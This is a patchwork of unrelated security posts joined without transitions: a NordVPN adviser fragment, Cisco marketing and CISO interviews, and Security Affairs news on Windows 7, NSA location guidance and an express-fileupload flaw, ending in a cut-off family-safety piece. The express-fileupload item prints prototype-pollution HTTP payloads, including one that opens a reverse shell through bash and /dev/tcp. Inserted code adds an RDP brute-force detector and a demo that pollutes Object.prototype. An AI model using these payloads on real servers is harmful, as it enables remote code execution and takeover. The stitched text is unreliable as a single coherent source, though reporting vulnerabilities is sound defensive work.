So Tom asked me if I'd like to become an adviser to NordVPN and invest a bit more time than just a telephone call sharing these ideas. I thought about it for a while, kept using the product, liked it, realised it's not like I'm travelling anywhere anytime soon so I've got the time and gave him a thumbs up. So here we are. I'll be devoting some cycles each month to work with NordVPN on their tools and messaging with a view to helping them make a great product even better. Yes, it's a commercial relationship but no, I won't be employed by them, will remain independent and will continue to do all the things I usually do anyway (except travel, of course).

NordVPN has done a great job getting their product out to 14 million people worldwide and frankly, that's a pretty impressive number for a tool your average consumer has no idea about. I'm looking forward to working with them on the product, reaching more people and having a greater positive impact on digital privacy.

What is application-first security?

Securing applications is the #1 area to invest in for your future. Your applications run your digital business. They underpin the world's economy, our family businesses, schools, corporations, and the means of our daily activities. So why hadn't I heard of application security before six months ago?

I began to learn about application-first security as the world started needing it most. In 2020, security has become even more important to customers and partners because attackers are jumping at the opportunity.

Applications are part of everyday life. We use them on our phones and laptops, and businesses use them to deliver services, store private customer information, and more. There are endless uses for applications, and as more are developed and updated every day, the threats against the organizations that depend on them multiply.

Application-first security is the idea that applications are critical to running businesses and operations: they must be secured because they drive business value, yet they run everywhere and are constantly being updated. That nature is what makes them hard to secure. There are three stages in the application life cycle: development, deployment and testing, and runtime. There is a lot to think about when securing applications, so how do you keep track of them and make sure that, even as they move to the cloud, your business stays secure?

Simple. Cisco has a suite of products that intelligently address application-first security: Tetration, Stealthwatch Cloud, Duo Beyond and AppDynamics.

Application workloads need to be secured individually, so that a breach elsewhere in your cloud infrastructure does not expose them. Tetration protects application workloads with policy enforcement and micro-segmentation, which limits lateral movement between applications in a data center or in the cloud.

Application security requires threat visibility and detection to quickly warn you about possible breaches. Stealthwatch Cloud gives your business the ability to respond to threats using an alert system and machine learning, providing deep insights.

Your applications need to be securely accessed by employees, without possible threats entering your cloud environment. Duo Beyond enables your workforce to stay compliant with your organization’s security postures.

Your applications require regular behavioral analysis to ensure threats are not present in your public and private cloud environments. AppDynamics offers application performance monitoring, reducing risk by empowering your organization to detect and prevent breaches.

Cisco’s solution is the ultimate answer to application security. By putting your organization’s applications first, you ensure the safety of the business’s most valued assets.

Learn more about Cisco Application-First Security

The post What is application-first security? appeared first on Cisco Blogs.

FBI is warning of cyber attacks against Windows 7 systems that reached end-of-life

The FBI warned private industry partners of risks impacting companies running Windows 7 after the Microsoft OS reached the end of life on January 14.

The Federal Bureau of Investigation is warning companies running Windows 7 systems that they face a greater risk of compromise because the Microsoft OS reached end of life on January 14, 2020.

Earlier this week, the FBI sent a private industry notification (PIN number 20200803-002) to partners in the US private sector.

“The FBI has observed cyber criminals targeting computer network infrastructure after an operating system achieves end of life status,” reads the FBI’s PIN.

“Continuing to use Windows 7 within an enterprise may provide cyber criminals access in to computer systems. As time passes, Windows 7 becomes more vulnerable to exploitation due to lack of security updates and new vulnerabilities discovered.”

“With fewer customers able to maintain a patched Windows 7 system after its end of life, cyber criminals will continue to view Windows 7 as a soft target,” the PIN adds.

The FBI urges organizations to upgrade systems running Windows 7 to newer versions for which Microsoft still provides security updates.

“Upgrading operating systems to the latest supported version. Ensuring anti-virus, spam filters, and firewalls are up to date, properly configured, and secure.” continues the PIN.

Microsoft still lets Windows 7 users upgrade to Windows 10 for free, but the underlying hardware does not always meet Windows 10's requirements. Organizations that cannot migrate immediately can buy Extended Security Updates (ESU) for Windows 7 Professional and Enterprise, which Microsoft sells for up to three years after end of life; ESU is a paid stopgap, not a substitute for migration.

The FBI cited the earlier Windows XP migration as a precedent: many systems that were not upgraded remained exposed to a significant number of attacks.

“Increased compromises have been observed in the healthcare industry when an operating system has achieved end of life status. After the Windows XP end of life on 28 April 2014, the healthcare industry saw a large increase of exposed records the following year,” the FBI said.

The FBI noted that threat actors can exploit multiple known vulnerabilities in Windows 7 to compromise systems still running it.

Working exploits for many of these flaws are publicly available, among them EternalBlue (CVE-2017-0144, SMBv1) and BlueKeep (CVE-2019-0708, Remote Desktop Services).

The FBI added that several companies have yet to upgrade their systems and urged them to do so; the agency also provided the following recommendations:

  • Ensuring anti-virus, spam filters, and firewalls are up to date, properly configured, and secure.
  • Auditing network configurations and isolating computer systems that cannot be updated.
  • Auditing your network for systems using RDP, closing unused RDP ports, applying two-factor authentication wherever possible, and logging RDP login attempts.
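Logging RDP login attempts, the last of the FBI's recommendations, only helps if something looks at the log. The Python below is an added example, not from the FBI notification or Security Affairs: it runs a simple brute-force detector over a constructed, simplified one-event-per-line export of Windows Security events (4625 = failed logon, 4624 = successful logon, logon type 10 = RemoteInteractive, i.e. RDP), raises an alert when one source address fails repeatedly inside a short window, and raises a second, higher-severity alert if that source later logs on successfully. The one-line format and its field names are assumptions made for the example.

```python
"""
Brute-force detection over RDP logon events.

Added example (not from the FBI notification): reads a constructed,
simplified export of Windows Security events, keeps only RDP logons
(logon type 10 = RemoteInteractive), alerts when one source fails
`threshold` times inside `window`, and alerts again if that source then
logs on successfully. Event IDs: 4625 = failed logon, 4624 = success.
The line format and field names are assumptions for the example.
"""
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta
from typing import Deque, Dict, List, Set

# Constructed sample export. Real 4624/4625 events are multi-line; adapt
# LINE_RE to your own export (for example Get-WinEvent piped to Export-Csv).
SAMPLE_LOG = """\
2020-08-05T03:12:01Z EventID=4625 LogonType=10 Account=administrator Source=203.0.113.5
2020-08-05T03:12:03Z EventID=4625 LogonType=10 Account=administrator Source=203.0.113.5
2020-08-05T03:12:05Z EventID=4625 LogonType=10 Account=admin Source=203.0.113.5
2020-08-05T03:12:07Z EventID=4625 LogonType=10 Account=backup Source=203.0.113.5
2020-08-05T03:12:09Z EventID=4625 LogonType=10 Account=administrator Source=203.0.113.5
2020-08-05T03:12:30Z EventID=4624 LogonType=10 Account=administrator Source=203.0.113.5
2020-08-05T08:00:00Z EventID=4625 LogonType=10 Account=jsmith Source=10.0.0.23
2020-08-05T08:00:10Z EventID=4624 LogonType=10 Account=jsmith Source=10.0.0.23
2020-08-05T09:15:00Z EventID=4625 LogonType=2 Account=jsmith Source=-
"""

LINE_RE = re.compile(
    r"^(?P<ts>\S+) EventID=(?P<eid>\d+) LogonType=(?P<ltype>\d+) "
    r"Account=(?P<account>\S+) Source=(?P<source>\S+)$"
)

# 10 = RemoteInteractive (RDP). With Network Level Authentication enabled,
# failed RDP attempts are commonly logged as type 3 instead; add it if so.
RDP_LOGON_TYPES = {10}


def parse_events(text: str) -> List[Dict]:
    """Parse the one-line export into event dicts, skipping non-matching lines."""
    events: List[Dict] = []
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if not m:
            continue
        events.append({
            "ts": datetime.strptime(m["ts"], "%Y-%m-%dT%H:%M:%SZ"),
            "event_id": int(m["eid"]),
            "logon_type": int(m["ltype"]),
            "account": m["account"],
            "source": m["source"],
        })
    return events


def detect_rdp_bruteforce(events: List[Dict], threshold: int = 5,
                          window: timedelta = timedelta(minutes=5)) -> List[Dict]:
    """Alert on sources with >= threshold RDP failures inside `window`,
    and on any later RDP success from a source already flagged."""
    recent: Dict[str, Deque[datetime]] = defaultdict(deque)  # source -> failure times
    accounts: Dict[str, Set[str]] = defaultdict(set)         # source -> accounts tried
    flagged: Set[str] = set()
    alerts: List[Dict] = []
    for ev in sorted(events, key=lambda e: e["ts"]):
        if ev["logon_type"] not in RDP_LOGON_TYPES:
            continue
        src = ev["source"]
        if ev["event_id"] == 4625:
            q = recent[src]
            q.append(ev["ts"])
            accounts[src].add(ev["account"])
            while q and ev["ts"] - q[0] > window:  # slide the window forward
                q.popleft()
            if len(q) >= threshold and src not in flagged:
                flagged.add(src)
                alerts.append({
                    "kind": "bruteforce",
                    "source": src,
                    "failures": len(q),
                    "accounts": sorted(accounts[src]),
                    "last_seen": ev["ts"],
                })
        elif ev["event_id"] == 4624 and src in flagged:
            # A success from a source that was brute forcing: likely compromise.
            alerts.append({
                "kind": "success_after_bruteforce",
                "source": src,
                "account": ev["account"],
                "at": ev["ts"],
            })
    return alerts


if __name__ == "__main__":
    for alert in detect_rdp_bruteforce(parse_events(SAMPLE_LOG)):
        print(alert)
```

On the sample the detector produces two alerts for 203.0.113.5 (five failures against three accounts within eight seconds, then a successful logon as administrator) and nothing for the user who mistyped a password once. The logon-type caveat in the comment matters on Windows 7: with NLA enabled the failed attempts you want to count often arrive as type 3, so check a known-bad sample before trusting the threshold.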

Pierluigi Paganini

(SecurityAffairs – hacking, Windows)

The post FBI is warning of cyber attacks against Windows 7 systems that reached end-of-life appeared first on Security Affairs.

Cyber Defense Magazine – August 2020 has arrived. Enjoy it!

The Cyber Defense Magazine August 2020 edition has arrived. We hope you enjoy this month’s edition, packed with over 147 pages of excellent content.

Learn from the experts, cybersecurity best practices

Find out about upcoming information security related conferences, expos and trade shows. Always free, no strings attached.

Enjoy and Thank You for Joining Us!
Let’s get one step ahead of the next threat,

Cyber Security Magazine
with a Consumer Focus (B2C)***NEW***
Don’t miss out: two unique webinars each month….

Cyber Defense Webinars

Please visit Cyber Defense TV and watch our latest interviews; we have 80+ new interviews being uploaded this month. Please visit Cyber Defense Radio for streaming and downloadable podcasts. The Black Unicorn Report for 2020 is now online.

Highlighted sponsors this month: RSA Conference 2020

Want to sponsor our eMagazine?

Check out our
media kit and reach out to

Pierluigi Paganini

(SecurityAffairs – hacking, cyber defense magazine)

The post Cyber Defense Magazine – August 2020 has arrived. Enjoy it! appeared first on Security Affairs.

NSA releases a guide to reduce location tracking risks

The United States National Security Agency (NSA) is warning of risks posed by location services for staff who work in defence or national security.

The United States National Security Agency (NSA) published a new guide to warn of the risks posed by location services for staff who work in defence or national security.

The guide, titled “Limiting Location Data Exposure,” warns of the geolocation features built into smartphones, tablets, and fitness trackers.

“Mobile devices store and share device geolocation data by design. This data is essential to device communications and provides features—such as mapping applications—that users consider indispensable. Mobile devices determine location through any combination of Global Positioning System (GPS) and wireless signals (e.g., cellular, wireless (Wi-Fi), or Bluetooth (BT)).” reads the NSA’s guide. “Location data can be extremely valuable and must be protected. It can reveal details about the number of users in a location, user and supply movements, daily routines (user and organizational), and can expose otherwise unknown associations between users and locations.”

The agency reminds its staff that location data is extremely valuable information that must be properly protected. It can reveal where individuals are, how users and supplies move, and their daily routines, among other things. Exposure of such data is especially critical for intelligence and defense personnel.

The guide points out that devices may be designed to store or transmit location data even when location settings or all wireless capabilities have been disabled.

The guide also highlights that location data from a mobile device can be obtained even without provider cooperation. An attacker could use commercially available rogue base stations to easily obtain real-time location data and track targets.

“This equipment is difficult to distinguish from legitimate equipment, and devices will automatically try to connect to it, if it is the strongest signal present.” continues the guide.

Mitigations could help to reduce, but do not eliminate, location tracking risks in mobile devices. In many cases, users rely on features disabled by such mitigations, making such safeguards impractical.

The guide includes multiple mitigations, including turning off radios when not in use, disabling features like “Find my Phone,” and using a VPN.

It also recommends restricting advertising permissions as far as possible, by limiting ad tracking and resetting the device’s advertising ID regularly (at least weekly).

“While it may not always be possible to completely prevent the exposure of location information, it is possible—through careful configuration and use—to reduce the amount of location data shared,” the guide concludes. “Awareness of the ways in which such information is available is the first step.”

Pierluigi Paganini

(SecurityAffairs – NSA, location services)

The post NSA releases a guide to reduce location tracking risks appeared first on Security Affairs.

Experiences from Cybersecurity Leaders in Extraordinary Times: Adjustments and Outcomes

The sudden move to telework this year imbued the word “challenge” with new meaning for security executives. Within a matter of days and weeks, many of these leaders had to figure out how they could rework their employers’ security policies in such a way that supported a massive shift to working from home. This period required significant ingenuity and unprecedented forward thinking, not to mention a deep understanding of their employers’ overall security needs.

We at Cisco wanted to find out the types of adjustments that security executives made in the wake of this challenge, as well as how these changes ultimately panned out for them. To get an idea of all this, we spoke to more than a dozen security leaders about their individual experiences. Here’s what some of them had to say.


Mick Jenkins MBE | Chief Information Security Officer at Brunel University London

@FailsafeQuery | (LinkedIn)

Having dealt in risk management all my life, often in life and death situations, the mantras came at me like a flood over the last few months: ‘Never let a good crisis go to waste,’ ‘Act early, move fast, and stay low,’ ‘Improvise, adapt, overcome.’ But there was only one mantra that I knew would stand the test of an enduring campaign – a mantra often cited by my long-time mentor: ‘Always keep a half pint of goodwill with your people, you’ll never know when you’ll need to call upon it in a crisis.’

Crises are all about people and how people can react smartly to reduce any potential damage and harm. That’s why ‘train hard, fight easy’ was always a core principle for me, throughout a career full of crises.

We needed to do three major things: 1) Equip staff and students with the appropriate work tools, 2) overlay sensible security measures, and 3) train the workforce on the threats, then message them again and again. Engagement was key – a gentle ‘drip, drip’ of solid and sensible advice to keep their homes cyber safe.

Our story wasn’t a story of petals and roses, there have been some serious difficulties and lots of frustration – but if you work that well, and ‘hog the pain,’ it eventually leads to the fog lifting and people making a critical difference.

With great teamwork, and great leadership, magnificent things can happen. Never let fear get in the way of your dreams.


Sandy Dunn | Chief Information Security Officer, Large Insurance Provider, Idaho

@subzer0girl | (LinkedIn)

The unknown for our organization working remotely was a cultural concern instead of a technical readiness concern. Our organization has had the technical ability to work remotely in place for a while, but since we are a smaller, single-state entity, the culture was accustomed to having meetings and serious discussions in person.

Prior to 2020, it was very common for people outside of IT to not even sign into a messaging client. You were forced to call, email, or walk to their desk to get a simple answer to a simple question. Working remotely has encouraged people who weren’t as familiar or comfortable with messaging and group chats to grow their technical acumen and adopt different communication practices.

Looking back, I don’t really have anything I think we should have done differently, but I am trying to navigate ongoing concerns with not being able to be with people in person.

Individuals all process high stress / high uncertainty differently, and since I’m not able to connect with my team in person, I’m not able to really “see” how everyone is doing. To remediate being unable to observe people in person, the team is making an extra effort to do mental health check-ins with each other, watching each other for symptoms of burnout or high stress, and adding video to our online meetings.


Quentyn Taylor | Director of Information Security at Canon for EMEA

@quentynblog | (LinkedIn)

I think the main thing to remember is that whilst this way of working feels new, it is only the volume of “home work” that is new. Many companies have always had people working from home from different locations and from on the road, and so to believe that this “new” way is totally different to how you were working before is probably wrong.

With that being said, there are two kinds of companies at this moment in time: those that have their email and collaboration tools in the cloud and those that are frantically trying to get the email and collaboration tools in the cloud.

So, my practical advice would be to ensure that you focus on getting the basics right. That means making sure that you have multi-factor authentication implemented to control access to all of your cloud resources. Making sure that you understand what your perimeter looks like. With everyone now working from home, your perimeter just got a lot bigger. Ensure that you have a way of patching your client machines even though they’re not on your network anymore. Alternatively, design your working practices so that you don’t need to worry about machines at the other end and whether they are patched.


Angus Macrae | Head of Cyber Security

@AMACSIA | (LinkedIn)

From a technology perspective, whilst cloud services were pretty much born for this remote work world, most organizations are still in a hybrid way of doing things and will still run legacy, in-house services and systems traditionally accessed on-premise only. As few would have anticipated needing to grant large-scale remote access to such services at short notice, few would have had all the tools and capacity ready to do so both reliably and securely. This requires thinking on one’s feet and rapid, high-pressured upgrading and rearchitecting of various components and processes.

From a people perspective, not everyone has been fortunate enough to have optimal home environments to work from during the lockdown, and few companies will have had a chance to truly consider all of the mental and physical health implications of their dispersed and sometimes isolated workers. On a wider societal note, it further accentuates the digital divide often talked about between the digital ‘haves’ and ‘have nots’ and those whose work simply has to carry on in the physical world despite the health risks it currently entails.


Gabriel Gumbs | Chief Innovation Officer at Spirion

@GabrielGumbs | (LinkedIn)

We decided early on that having a well-defined collaboration and communication strategy was key for the transition to remote work. That also meant ensuring we had a process for communicating early and often with our people. Our employees and managers made a more conscious effort to clarify roles and expectations as well as discuss progress with remote employees. Additionally, allowing employees to use equipment that they had access to in the office allowed for a smoother transition.

Efforts to centralize all pertinent company knowledge in one accessible library are also key to work-from-home success. Spirion’s CEO has done an excellent job taking the time to update employees on what actions the company is taking on a regular basis. And then, there are the fun social activities to bring everyone together online and keep morale up, such as after-hours trivia and virtual hangouts.


Andy Rose | Chief Security Officer at Vocalink

@AndyRoseCISO | (LinkedIn)

The need for 24/7 support of services had already driven the enablement of remote working at Vocalink, which is a part of the critical national infrastructure of the United Kingdom. The crisis therefore did not represent a large technical challenge. Staff fell into new working practices quite easily, and productivity remained consistent. Our parent company, Mastercard, had invested in increased VPN capacity and bandwidth as the crisis developed, so connectivity was available and stable.

Like many firms, our expectations of collaboration had been too focused on ‘in the office, in the room,’ and this new remote working model undermined that somewhat. The traditional voice conferencing facilities and instant messaging only partially met the requirements, so we had to rush to adapt and develop our online collaboration capabilities, introducing improved video conferencing capabilities and virtual white-boarding.

The reality is that we will never go back to the way we worked before. This digital transformation has been forced on all industries, and it’s highlighted how different work patterns can be equally effective. Time spent commuting long distances, for instance, could be better used by the firm to further improve productivity.


Ian Thornton-Trump | Chief Information Security Officer at Cyjax Limited

@phat_hobbit | (LinkedIn)

Try to be at peace with yourself and balance realism, optimism, and the achievable in your thinking. Above all, be patient with yourself and others. Take some time – a break in the middle of the day – to distract from the chaos that is permeating nearly every aspect of our days and nights.

I’m into exercising and gardening, and I just finished a book on the Templar Knights in the UK. (I’m planning an epic trip to visit as many of these ancient Templar sites as possible.) Stay in touch with your close friends and family, and be compassionate about folks in rougher circumstances than your own.

Ultimately, treat these extraordinary times as an opportunity to reflect on your life choices and career. As I look back on 25+ years in the industry, I know what I need to do next. I need to turn my knowledge into wisdom and create as many opportunities for the next generation of IT professionals as I can.


Michael Ball | Virtual Chief Information Security Officer at TeamCISO 

@Unix_Guru | (LinkedIn)

After COVID-19 hit, it took us a little bit of time to adjust to having our workforce not in the office and being able to work from home. This abrupt change in work policy meant configuring our VPN and adding licensing for a significant portion of our workforce that had never required VPN access in the past.

We quickly scrambled to get the VPN clients configured and pushed out to allow the employees to take their devices home with them. There were issues immediately in training end users to use the VPN client from home as well as an issue with excessive permissions allowed on the VPN groups from the beginning. (Convenience and speed trumps security yet again!)

Another issue that we found and hadn’t anticipated was that many of the employees were able to conduct their daily work without ever connecting their VPN back to the company. Things like Office 365, Salesforce and other SaaS applications allowed them to conduct their daily business (email, etc.) without connectivity to our office. That unfortunately put us in a position where we lost visibility to those devices. We had not considered forcing the VPN connectivity so that we could ensure that updates and endpoint protection were updated and appropriate, and that device monitoring wasn’t completely missing.

We had to send out an email and request that each individual send their device back into the office. We then scrambled to develop a procedure by which to accept the devices, refresh them, and send them back safely to allow us to reconfigure and force VPN connectivity at least periodically.


Shelly Blackburn | Vice President, Global Cyber Security Systems Engineering at Cisco

@shellyblackburn | (LinkedIn)

Cisco is a bit unique. Due to years of driving remote work internally, Cisco strategy is not solely driven from a small, homogenous, geographically centralized team. We have a truly global team and hire from a diverse candidate pool.

Strategic Take-Away #1: Get your leadership excited about the value to your organization. Remote work environments enable innovation, opportunity, and drive growth.

In response to the pandemic, we moved customers from 100% face-to-face work to remote work very quickly. Some moves were done in a matter of days, and this worked surprisingly well. Due to the shift to social online tools in our personal lives, colleges, government entities, and businesses adjusted to video calls and collaborative online tools fairly seamlessly.

Strategic Take-Away #2: Don’t be afraid to make the move to remote work quickly. With the right tools and a secure remote environment, the company and worker satisfaction with remote work can be extremely high.


Thom Langford | Founder of (TL)2 Security Ltd. 

@ThomLangford | (LinkedIn)

What’s worked well for me remote working during lockdown? Well, actually, I’ve always been sort of a remote worker, even back during my full employment days. I was able to work wherever and whenever I wanted to mainly because the services that supported me (IT services) were based in the cloud and not fixed at one location.

I’ve carried on that model in my own business. So, it doesn’t matter where I am, although right now it’s obviously one single place. I can use whatever I need wherever I need it. That includes Office 365, Adobe, and even my pension and payroll services. They’re all managed through the cloud.

The one thing I wish I had done better actually was to prepare more for videoconferencing when it comes to face-to-face meetings. I’m someone who likes to travel to meet people, to have business lunches, and even better, business dinners with somebody, because that’s how I like to connect… That’s how we get to know and build a relationship with each other.

Now, of course, it is very different. We have to use videoconferencing. It’s easy for me in a sense because the Office 365 package provides all of that for me. But I find it difficult to create an initial rapport. So, for me, the biggest change and the biggest thing that I wish I had done sooner was that cultural change, that one of actually being able to adapt to video conferencing quicker. I’m used to it now, and I’ve always liked video conferencing when there was no alternative, but it feels very forced, or at least it did when all of this first kicked off.

I’m spending the time, as much as I can, learning and picking up on things whilst I’m in lockdown. I’m trying not to waste any of the time whatsoever on superfluous activities.


Brad Arkin | SVP, Chief Security & Trust Officer at Cisco

@BradArkin | (LinkedIn)

Business has transformed virtually overnight to a greater emphasis on working remotely and collaborating virtually. We at Cisco are in a fortunate position to work effectively and securely in a remote environment, and have seamlessly transitioned 95 percent of our global workforce to work from home. Additionally, as the largest security company in the world, Cisco has protected millions of users since the roll-out of our free security offerings to support customers as they transitioned workforces to remote work.

This situation is a reminder that we need to be planful, agile, and constantly reinvent ourselves to keep pace with the needs of today and the future, as well as to anticipate the unexpected and unknown. The speed by which this situation arose and altered our approach to work, most likely forever, shows how important it is to be able to see around corners, to plan, prepare, and adjust for whatever may come.


We’ve all been forced to adapt these past months. Some of us found ourselves working from home for the first time. You can hear more about security leaders’ remote working experiences and advice in the clip below:



For additional perspectives on how employees can make the most of remote work, download Cisco’s eBook:
Adjusting to Extraordinary Times: Tips from Cybersecurity Leaders Around the World


The post Experiences from Cybersecurity Leaders in Extraordinary Times: Adjustments and Outcomes appeared first on Cisco Blogs.

Flaw in popular NodeJS ‘express-fileupload’ module allows DoS attacks and code injection

An expert found a flaw in a popular NodeJS module that can allow attackers to perform a denial-of-service (DoS) attack on a server or achieve arbitrary code execution.

The NodeJS module “express-fileupload” has been downloaded more than 7.3 million times from the npm repository.

The module is affected by a ‘Prototype Pollution’ vulnerability, tracked as CVE-2020-7699, that can allow attackers to perform a denial-of-service (DoS) attack on a server or inject arbitrary code.

“This affects the package express-fileupload before 1.1.8. If the parseNested option is enabled, sending a corrupt HTTP request can lead to denial of service or arbitrary code execution.” reads NIST’s description.

Unfortunately, the actual number of installs could be greater because developers could download the module from alternative repositories, including GitHub and mirror websites.

Prototypes define a JavaScript object’s default structure and default values; they specify the expected structure when no values have been set.

An attacker who is able to modify a JavaScript object prototype can crash an application, or change its behavior, when the application does not receive the values it expects.

Given how widespread JavaScript is, the exploitation of prototype pollution flaws can have serious consequences for web applications.

Prototype pollution attacks consist of injecting incompatible object types into existing ones to trigger errors that can lead to a denial-of-service (DoS) condition or arbitrary code execution, including the establishment of a remote shell.

According to the security researcher Posix, who discovered the vulnerability, the issue stems from the “parseNested” feature implemented by express-fileupload.

The express-fileupload module implements several options for uploading and managing files in a nodejs application. One of them is parseNested, which expands flattened (dotted) argument names into nested objects.

“Therefore, if we provide {"a.b.c": true} as an input, internally it will be used as {"a": {"b": {"c": true}}},” reads the post published by Posix.

Below is the code for the ‘parseNested’ option:

const express = require('express');
const fileUpload = require('express-fileupload');
const app = express();

// parseNested expands dotted field names into nested objects; this is the
// option the write-up shows enabled on the vulnerable server.
app.use(fileUpload({ parseNested: true }));

app.get('/', (req, res) => {
  res.end('express-fileupload poc');
});

app.listen(3000); // port is a placeholder; the original post's value is not shown here


By placing a payload in the “Content-Disposition” HTTP header, an attacker can supply a “__proto__.toString” field name to trigger the attack.

“Therefore, configure and run the express server using express-fileupload in the above form.” continues the post.

Content-Type: multipart/form-data; boundary=--------1566035451
Content-Length: 123

Content-Disposition: form-data; name="name"; filename="filename"


The “__proto__” mutator can be used to modify JavaScript’s “Prototype” property as inherited by all JS objects and structures.

This means that the above HTTP request will override and corrupt the built-in “toString” method of every object present in users’ code.

“If Object.prototype.toString can be polluted, this will cause an error, and for every request, express [sic] always returns 500 error,” continues the researcher.

The researcher also explained that an attacker could exploit the same flaw to get a shell on the vulnerable system. This variant of the attack requires that the application running the vulnerable “express-fileupload” version is also using the EJS (Embedded JavaScript templates) templating engine.

“The simplest way to obtain shell through prototype solution in the express application is by using the ejs. Yes, there is a limitation to whether the application should be using the ejs template engine,” continues the expert.

An attacker can trigger the issue by sending an HTTP request that overwrites the “outputFunctionName” option of EJS.

The payload below exploits prototype pollution within express-fileupload, and instructs EJS (should it be in use) to execute a NodeJS “child_process.” This process can be used to get a reverse shell to the attacker’s computer.

Content-Type: multipart/form-data; boundary=--------1566035451
Content-Length: 221

Content-Disposition: form-data; name="__proto__.outputFunctionName";

x;process.mainModule.require('child_process').exec('bash -c "bash -i &> /dev/tcp/ 0>&1"');x

The good news is that, immediately after receiving the researcher’s report, the express-fileupload maintainers fixed the vulnerability. Users are recommended to get the latest 1.1.9 version from the npm repository.
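To make the parseNested expansion and its fix concrete, here is an added example (not express-fileupload’s own code) that models the dotted-name expansion described above: a naive version that a “__proto__” segment steers into Object.prototype, beside a hardened version that rejects such segments and builds null-prototype objects. The field names and values are constructed for this demonstration, and a harmless marker property stands in for the toString overwrite discussed in the article.

```javascript
// Added example (not express-fileupload's own code): a minimal model of the
// parseNested behaviour described above, with a naive expansion that can be
// prototype-polluted and a hardened expansion that cannot. Field names and
// values below are constructed for this demonstration.

// Naive expansion: walks each dotted field name, creating intermediate objects.
// Because cur['__proto__'] on a plain object returns Object.prototype, a segment
// named __proto__ redirects the walk into the shared prototype, and the remaining
// segments are written there, where every object in the process inherits them.
function expandNestedUnsafe(fields) {
  const out = {};
  for (const [name, value] of Object.entries(fields)) {
    const parts = name.split('.');
    let cur = out;
    for (let i = 0; i < parts.length - 1; i++) {
      if (cur[parts[i]] === undefined) cur[parts[i]] = {};
      cur = cur[parts[i]];
    }
    cur[parts[parts.length - 1]] = value;
  }
  return out;
}

// Segments that must never be used as a path into an object graph.
const FORBIDDEN_SEGMENTS = new Set(['__proto__', 'constructor', 'prototype']);

// Hardened expansion: rejects forbidden segments up front, builds only
// null-prototype objects (so even a literal "__proto__" key would become an
// ordinary own property rather than the inherited accessor), and refuses to
// descend into a non-object value that an earlier field already set.
function expandNestedSafe(fields) {
  const out = Object.create(null);
  for (const [name, value] of Object.entries(fields)) {
    const parts = name.split('.');
    if (parts.some((p) => FORBIDDEN_SEGMENTS.has(p))) {
      throw new Error(`rejected field name "${name}": forbidden path segment`);
    }
    let cur = out;
    for (let i = 0; i < parts.length - 1; i++) {
      const seg = parts[i];
      if (!Object.prototype.hasOwnProperty.call(cur, seg)) {
        cur[seg] = Object.create(null);
      } else if (typeof cur[seg] !== 'object' || cur[seg] === null) {
        throw new Error(`rejected field name "${name}": "${seg}" is not an object`);
      }
      cur = cur[seg];
    }
    cur[parts[parts.length - 1]] = value;
  }
  return out;
}

// Detection helper: Object.prototype should never carry a property that the
// application itself did not define; checking for a known marker is the
// simplest way to confirm whether an expansion reached the shared prototype.
function prototypeIsPolluted(marker) {
  return Object.prototype.hasOwnProperty.call(Object.prototype, marker);
}

// Constructed multipart field names, modelled on the shape used in the
// write-up but planting a harmless marker instead of overwriting toString.
const CONSTRUCTED_FIELDS = {
  'user.name': 'alice',
  '__proto__.polluted': 'yes',
};

function demonstrate() {
  const result = {};

  const unsafe = expandNestedUnsafe(CONSTRUCTED_FIELDS);
  result.unsafeUserName = unsafe.user.name;                     // ordinary fields still work
  result.pollutedAfterUnsafe = prototypeIsPolluted('polluted'); // the marker reached Object.prototype
  result.freshObjectInherits = ({}).polluted;                   // a brand-new object now sees it
  delete Object.prototype.polluted;                             // undo the damage for the rest of the process
  result.cleanAfterDelete = prototypeIsPolluted('polluted');

  let safeRejected = false;
  try {
    expandNestedSafe(CONSTRUCTED_FIELDS);
  } catch (e) {
    safeRejected = true;                                        // the hardened parser refuses the field
  }
  result.safeRejected = safeRejected;
  result.pollutedAfterSafe = prototypeIsPolluted('polluted');

  const safe = expandNestedSafe({ 'user.name': 'bob', 'user.role': 'viewer' });
  result.safeUserName = safe.user.name;
  result.safeUserRole = safe.user.role;
  return result;
}
```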

Pierluigi Paganini


The post Flaw in popular NodeJS ‘express-fileupload’ module allows DoS attacks and code injection appeared first on Security Affairs.

What Security Means to Families


One truth of parenting is this: we do a lot of learning on the job. And that often goes double when it comes to parenting and the internet.

That’s understandable. Whereas we can often look to our own families and how we were raised for parenting guidance, today’s always-on mobile internet, with tablets and smartphones almost always within arm’s reach, wasn’t part of our experience growing up. This is plenty new for nearly all of us. We’re learning on the job as it were, which is one of the many reasons why we reached out to parents around the globe to find out what their concerns and challenges are—particularly around family safety and security in this new mobile world of ours.

Just as we want to know our children are safe as they walk to school or play with friends, we want them to be just as safe when they’re online, particularly when we’re not around to look over their shoulder. Yet where we likely have good answers for keeping our kids safe around the house and the neighborhood, answers about internet safety are sometimes harder to come by.

Recently, we conducted a survey of 600 families and professionals in the U.S. to better understand what matters to them—in terms of security and the lives they want to lead online. The following article reflects what they shared with us, and allows us to share it with you in turn, with the aim of helping you and your family stay safer and more secure. [1]

What concerns and questions do parents have about the internet?

The short answer is that parents are looking for guidance and support. They’re focused on the safety of their children, and they want advice on how to parent when it comes to online privacy, safety, and screen time. Within that, they brought up several specific concerns:

Help my kids not feel anxious about growing up in an online world.

There’s plenty wrapped up in this statement. For one, it refers to the potential anxiety that revolves around social networks and the pressures that can come with using social media—how to act, what’s okay to post and what’s not, friending, following, unfriending, unfollowing, and so on—not to mention the notion of FOMO, or “fear of missing out,” and anxiety that arises from feelings of not being included in someone else’s fun.

Keep my kids safe from bullying, or bullying others.

Parents are right to be concerned. Cyberbullying happens. According to a UNICEF study spanning 30 countries, one child in three has said they’ve been the victim of cyberbullying. On the flip side of that, a 2016 study of more than 5,000 students in the U.S. by the Cyberbullying Research Center reported that 11.5% of students between 12 and 17 indicated that they had engaged in cyberbullying in their lifetime.

Feel like I can leave my child alone with a device without encountering inappropriate content.

If we think of the internet as a city, it’s the biggest one there is. For all its libraries, playgrounds, movie theatres, and shopping centers, there are dark alleys and derelict lots as well. Not to mention places that are simply age appropriate for some and not for others. Just as we give our children freer rein to explore their world on their own as they get older, the same holds true for the internet. There are some things we don’t want them to see and do.

Balance the amount of screen time my children get each day.

Screen time is a mix of many things—from schoolwork and videos to games and social media. It has its benefits and its drawbacks, depending on what children are doing and how often they’re doing it. The issue often comes down to what is “too much” screen time, particularly as it relates to the bigger picture of physical activity, face-to-face time with the family, hanging out with friends, and getting a proper bedtime without the dim light of a screen throwing off their sleep rhythms.

Where can parents get started?

